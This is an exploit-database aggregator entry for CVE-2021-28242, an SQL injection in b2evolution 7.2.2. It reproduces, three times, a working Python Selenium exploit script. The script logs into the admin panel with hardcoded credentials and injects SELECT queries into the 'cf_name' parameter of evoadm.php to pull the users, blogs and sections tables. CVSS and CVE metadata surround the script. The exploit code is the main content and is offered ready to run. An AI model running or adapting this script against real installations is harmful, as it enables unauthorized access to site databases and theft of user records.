b2evolution 7-2-2 - 'cf_name' SQL Injection

2021-05-06T00:00:00

Description

{"id": "EDB-ID:49840", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "b2evolution 7-2-2 - 'cf_name' SQL Injection", "description": "", "published": "2021-05-06T00:00:00", "modified": "2021-05-06T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49840", "reporter": "nu11secur1ty", "references": [], "cvelist": ["2021-28242", "CVE-2021-28242"], "immutableFields": [], "lastseen": "2022-05-13T17:38:17", "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-28242"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162489"]}, {"type": "zdt", "idList": ["1337DAY-ID-36206"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25005", "CVE-2020-25006"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162489"]}, {"type": "zdt", "idList": ["1337DAY-ID-36206"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/49840", "sourceData": "# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection \r\n# Author: @nu11secur1ty\r\n# Testing and Debugging: @nu11secur1ty\r\n# Date: 05.06.2021\r\n# Vendor: https://b2evolution.net/\r\n# Link: https://b2evolution.net/downloads/7-2-2\r\n# CVE: CVE-2021-28242\r\n# Proof: https://streamable.com/x51kso\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python3\r\n# Author: @nu11secur1ty\r\n# CVE-2021-28242\r\n\r\n\r\nfrom selenium import webdriver\r\nimport time\r\n\r\n\r\n# Vendor: https://typo3.org/\r\nwebsite_link=\"\r\nhttp://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link\"\r\n\r\n# enter your login username\r\nusername=\"admin\"\r\n\r\n# enter your login password\r\npassword=\"FvsDq7fmHvWF\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"x\"\r\n\r\n#enter the element for password input field\r\nelement_for_password=\"q\"\r\n\r\n#enter the element for submit button\r\nelement_for_submit=\"login_action[login]\"\r\n\r\n\r\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\r\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\r\nchromedriver]\r\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\r\n\r\nbrowser.get((website_link))\r\n\r\ntry:\r\nusername_element = browser.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = browser.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\nsignInButton = browser.find_element_by_name(element_for_submit)\r\nsignInButton.click()\r\n\r\n# Exploit vulnerability MySQL obtain sensitive database information by\r\ninjecting SQL commands into the \"cf_name\" parameter\r\ntime.sleep(7)\r\n# Receaving sensitive info for evo_users\r\nbrowser.get((\"http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\r\n\r\ntime.sleep(7)\r\n# Receaving sensitive info for evo_blogs\r\nbrowser.get((\"\r\nhttp://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\r\n\r\ntime.sleep(7)\r\n# Receaving sensitive info for evo_section\r\nbrowser.get((\"http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\r\n\r\n\r\ntime.sleep(7)\r\nbrowser.close()\r\n\r\n\r\nprint(\"At the time, of the exploit, you had to see information about the\r\ntables...\\n\")\r\n\r\n\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Sorry, your exploit is not working for some reasons...\")", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"zdt": [{"lastseen": "2021-11-08T14:24:37", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-06T00:00:00", "type": "zdt", "title": "b2evolution 7-2-2 - (cf_name) SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28242"], "modified": "2021-05-06T00:00:00", "id": "1337DAY-ID-36206", "href": "https://0day.today/exploit/description/36206", "sourceData": "# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection \n# Author: @nu11secur1ty\n# Vendor: https://b2evolution.net/\n# Link: https://b2evolution.net/downloads/7-2-2\n# CVE: CVE-2021-28242\n# Proof: https://streamable.com/x51kso\n\n[+] Exploit Source:\n\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# CVE-2021-28242\n\n\nfrom selenium import webdriver\nimport time\n\n\n# Vendor: https://typo3.org/\nwebsite_link=\"\nhttp://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link\"\n\n# enter your login username\nusername=\"admin\"\n\n# enter your login password\npassword=\"FvsDq7fmHvWF\"\n\n#enter the element for username input field\nelement_for_username=\"x\"\n\n#enter the element for password input field\nelement_for_password=\"q\"\n\n#enter the element for submit button\nelement_for_submit=\"login_action[login]\"\n\n\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\nsignInButton = browser.find_element_by_name(element_for_submit)\nsignInButton.click()\n\n# Exploit vulnerability MySQL obtain sensitive database information by\ninjecting SQL commands into the \"cf_name\" parameter\ntime.sleep(7)\n# Receaving sensitive info for evo_users\nbrowser.get((\"http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\n\ntime.sleep(7)\n# Receaving sensitive info for evo_blogs\nbrowser.get((\"\nhttp://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\n\ntime.sleep(7)\n# Receaving sensitive info for evo_section\nbrowser.get((\"http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\"))\n\n\ntime.sleep(7)\nbrowser.close()\n\n\nprint(\"At the time, of the exploit, you had to see information about the\ntables...\\n\")\n\n\n\nexcept Exception:\n#### This exception occurs if the element are not found in the webpage.\nprint(\"Sorry, your exploit is not working for some reasons...\")\n", "sourceHref": "https://0day.today/exploit/36206", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-06T15:08:35", "description": "", "cvss3": {}, "published": "2021-05-06T00:00:00", "type": "packetstorm", "title": "b2evolution 7-2-2 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-28242"], "modified": "2021-05-06T00:00:00", "id": "PACKETSTORM:162489", "href": "https://packetstormsecurity.com/files/162489/b2evolution-7-2-2-SQL-Injection.html", "sourceData": "`# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information by injecting SQL commands into the \"cf_name\" parameter \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.06.2021 \n# Vendor: https://b2evolution.net/ \n# Link: https://b2evolution.net/downloads/7-2-2 \n# CVE: CVE-2021-28242 \n# Proof: https://streamable.com/x51kso \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-28242 \n \n \nfrom selenium import webdriver \nimport time \n \n \n# Vendor: https://typo3.org/ \nwebsite_link=\" \nhttp://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link \n\" \n \n# enter your login username \nusername=\"admin\" \n \n# enter your login password \npassword=\"FvsDq7fmHvWF\" \n \n#enter the element for username input field \nelement_for_username=\"x\" \n \n#enter the element for password input field \nelement_for_password=\"q\" \n \n#enter the element for submit button \nelement_for_submit=\"login_action[login]\" \n \n \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit vulnerability MySQL obtain sensitive database information by \ninjecting SQL commands into the \"cf_name\" parameter \ntime.sleep(7) \n# Receaving sensitive info for evo_users \nbrowser.get((\" \nhttp://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections \n\")) \n \ntime.sleep(7) \n# Receaving sensitive info for evo_blogs \nbrowser.get((\" \nhttp://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections \n\")) \n \ntime.sleep(7) \n# Receaving sensitive info for evo_section \nbrowser.get((\" \nhttp://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections\")) \n \n \ntime.sleep(7) \nbrowser.close() \n \n \nprint(\"At the time, of the exploit, you had to see information about the \ntables...\\n\") \n \n \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Sorry, your exploit is not working for some reasons...\") \n \n--------------------------------- \n \n# Exploit Title: b2evolution 7-2-2 obtaining sensitive database information \nby injecting SQL commands into the \"cf_name\" parameter \n# Date: 05.06.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://b2evolution.net/ \n# Software Link: https://b2evolution.net/downloads/7-2-2 \n \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-28242 \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://www.exploit-db.com/ \nhttps://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162489/b2evolution722-sql.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-04T15:46:21", "description": "SQL Injection in the \"evoadm.php\" component of b2evolution v7.2.2-stable allows remote attackers to obtain sensitive database information by injecting SQL commands into the \"cf_name\" parameter when creating a new filter under the \"Collections\" tab.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-15T14:15:00", "type": "cve", "title": "CVE-2021-28242", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28242"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/a:b2evolution:b2evolution:7.2.2"], "id": "CVE-2021-28242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28242", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:b2evolution:b2evolution:7.2.2:*:*:*:*:*:*:*"]}]}

b2evolution 7-2-2 - &#039;cf_name&#039; SQL Injection

Description

Related

b2evolution 7-2-2 - 'cf_name' SQL Injection